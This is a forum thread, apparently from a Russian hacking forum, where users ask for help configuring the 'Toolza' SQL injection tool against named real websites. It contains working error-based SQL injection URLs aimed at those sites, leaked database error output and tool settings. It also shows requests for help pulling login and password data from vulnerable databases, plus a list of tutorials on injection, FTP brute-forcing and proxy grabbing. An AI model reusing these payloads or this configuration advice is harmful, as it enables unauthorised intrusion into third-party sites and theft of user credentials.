Почему это может извлекать данные с этими настройками? http://www.hno-praxis-seevetal.de/index.php?id=9842+and+substring%28version%28%29,1,1%29=5 #$bl_url = "http://www.hno-praxis-seevetal.de/index.php?id=9842"; #$bl_filtr = "--+"; #$bl_plus = "+"; #$bl_error = "Praxisumzug"; #$bl_error_type = 1;
Как я могу использовать эту ссылку в toolza http://games.cartoonnetworkhq.com/playGame.php?gameID=133%20and+1=%28select+count%28*%29+from+information_schema.tables+group+by+concat%28version%28%29,floor%28rand%280%29*2%29%29+limit+1%29/*
Я стараюсь много, но я не увенчались успехом, как использовать эту ссылку в toolza, пожалуйста, помогите http://games.cartoonnetworkhq.com/playGame.php?gameID=133%20and+1=%28select+count%28%20*%29+from+information_schema.tables+group+by+concat%28version%28%29,floor%28rand%280%29*2%29%29+limit+1%29/*
Hi i am posting again because i am not Russian so i am getting problem in translate into Russian so i am posting in english because i translate from google so maybe it is ok or not i donot know so sorry to all please can you help me how can i use this url in toolza http://games.cartoonnetworkhq.com/playGame.php?gameID=133%20and+1=%28select+count%28 %20*%29+from+information_schema.tables+group+by+co ncat%28version%28%29,floor%28rand%280%29*2%29%29+l imit+1%29/* Thank you for understand And this forum is best from all because all are helping alot to solve problems in antichat.ru i like this forum
http://games.cartoonnetworkhq.com/playGame.php?gameID=133%20and+1=%28select+count%28 %20*%29+from+information_schema.tables+group+by+concat%28version%28%29,floor%28rand%280%29*2%29%29+limit+1%29/* i try this in toolza $f_table = "information_schema.tables" $f_url = "http://games.cartoonnetworkhq.com/playGame.php?gameID=133 and+1=(select+count(*)+from+"; # url $f_plus = "+"; # %20,%2b & etc. $f_filtr = "/*"; # close SQL but not working
Подскажите плиз, как правильно настроить в тулсе floor по такой ссылке: Как ни настраивал не хочет получать данные тулса (
i use floor rand method to get version Technical Support: http://bbs.dedecms.com Error page: /newsDetail.php?id=389%20and+1=(select+count(*)+from+information_schema.tables+group+by+concat(version(),floor(rand(0)*2))+limit+1)-- Error infos: Duplicate entry '5.0.67-log1' for key 1 Error sql: select `id` from `call_archives` where `id`<389 and 1=(select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2)) limit 1)-- order by `id` desc limit 1 DedeCMS Error Warning! Technical Support: http://bbs.dedecms.com Error page: /newsDetail.php?id=389%20and+1=(select+count(*)+from+information_schema.tables+group+by+concat(version(),floor(rand(0)*2))+limit+1)-- Error infos: Duplicate entry '5.0.67-log1' for key 1 Error sql: select `id` from `call_archives` where `id`>389 and 1=(select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2)) limit 1)-- order by `id` asc limit 1 then i use in Toolza $f_table = "information_schema.tables"; # default 'information_schema.tables' if MySQL>=5 and if MySQL<5 - you must brute table_name before and print here $f_url = "http://site.com/newsDetail.php?id=389 and+1=(select+count(*)+from+"; # url $f_plus = "+"; # %20,%2b & etc. $f_filtr = "--"; # close SQL but not working is there any mistake in url ?
как избавится от этих крякообразов? через метод get все работает на ура,через метод пост-эта шляпа выходит... =) ...где чё крутить вертеть???
у меня вопрос в 4 версии надо 1.брутить таблицы. 2.брутить колонки на вывод колонок вышел login password и меня интересует как из login i password получить данные
Pashkela можно ли ч-з тулзу сделать так чтобы она сначало логинилась на индекс паге а уже потом шла к уязвимому скрипту? $https_mode_auth = 1; # 1 - whith authorization, 0 - no $https_auth_script_path = "/signin.php"; $https_auth_post_data = "uname=watltd&passwd=drowssap&Submit=Sign+In"; это только под https? У меня на http не работает пробывал вставлять куки, такая-же история.. не хватает этой возможности..
Народ в первом посте нет видео по настройки , у кого если есть видюшки по тулзе залейте плиз , не могу разобраться.
# VIDEO INSTRUCTIONS FOR ALL MODES: # #################################################################################### #1. http://bug-track.ru/prog/toolza1.0_video.rar - mysql>=5 sql inj #2. http://bug-track.ru/prog/toolza_msql4_brute.rar - MySql4 brute tables & columns #3. http://bug-track.ru/prog/toolza_blind5.rar - Blind MySql5 sql inj #4. http://bug-track.ru/prog/toolza_turbo.rar - Blind MySql sql inj TURBO-MODE #5. http://bug-track.ru/prog/toolza_md5.rar - Blind MySql sql inj MD5-TURBO-MODE #6. http://bug-track.ru/prog/toolza_column_bruter.rar - MySql column number bruter #7. http://bug-track.ru/prog/toolza_name_const.rar - MySql inj NAME_CONST method #8. http://bug-track.ru/prog/toolza_mssql.rar - MSSQL injection #9. http://bug-track.ru/prog/toolza_ps.rar - PostgreSQL injection #10. http://bug-track.ru/prog/toolza_sybase.rar - Sybase SQL injection #11. http://bug-track.ru/prog/toolza_access.rar - Ms Access SQL injection #12. http://bug-track.ru/prog/toolza_oracle.rar - Oracle SQL injection #13. http://bug-track.ru/prog/tololza_lrl.rar - LFI/READER/Load_file() bruter #14. http://bug-track.ru/prog/toolza_ftp.rar- FTP checker #15. http://bug-track.ru/prog/toolza_ftp_brute.rar - FTP bruter #16. http://bug-track.ru/prog/toolza_proxy.rar - PROXY checker #17. http://bug-track.ru/prog/toolza_proxy_grabber.rar - PROXY grabber #18. http://bug-track.ru/prog/toolza_socks.rar - SOCKS mode #19. http://bug-track.ru/prog/firebird_interbase.rar - firebird/interbase SQL injection
пробовал скачать http://bug-track.ru/prog/toolza1.0_video.rar не качается ну и ошибку не бывает. открывается какой то горе-форум и все.
вот, кое-как откопал на винте : http://narod.ru/disk/1658228001/toolza1.0_video.rar.html http://narod.ru/disk/1658354001/toolza_blind5.rar.html http://narod.ru/disk/1658404001/toolza_column_bruter.rar.html
Kappa_87 - ╨Р╨╗╨╡╨║╤Б╨╕╨╜╨╛ - это кодировка, раскодируй и получишь: ╨Р╨╗╨╡╨║╤Б╨╕╨╜╨╛ ---> Алексино CP866 ---> UTF-8
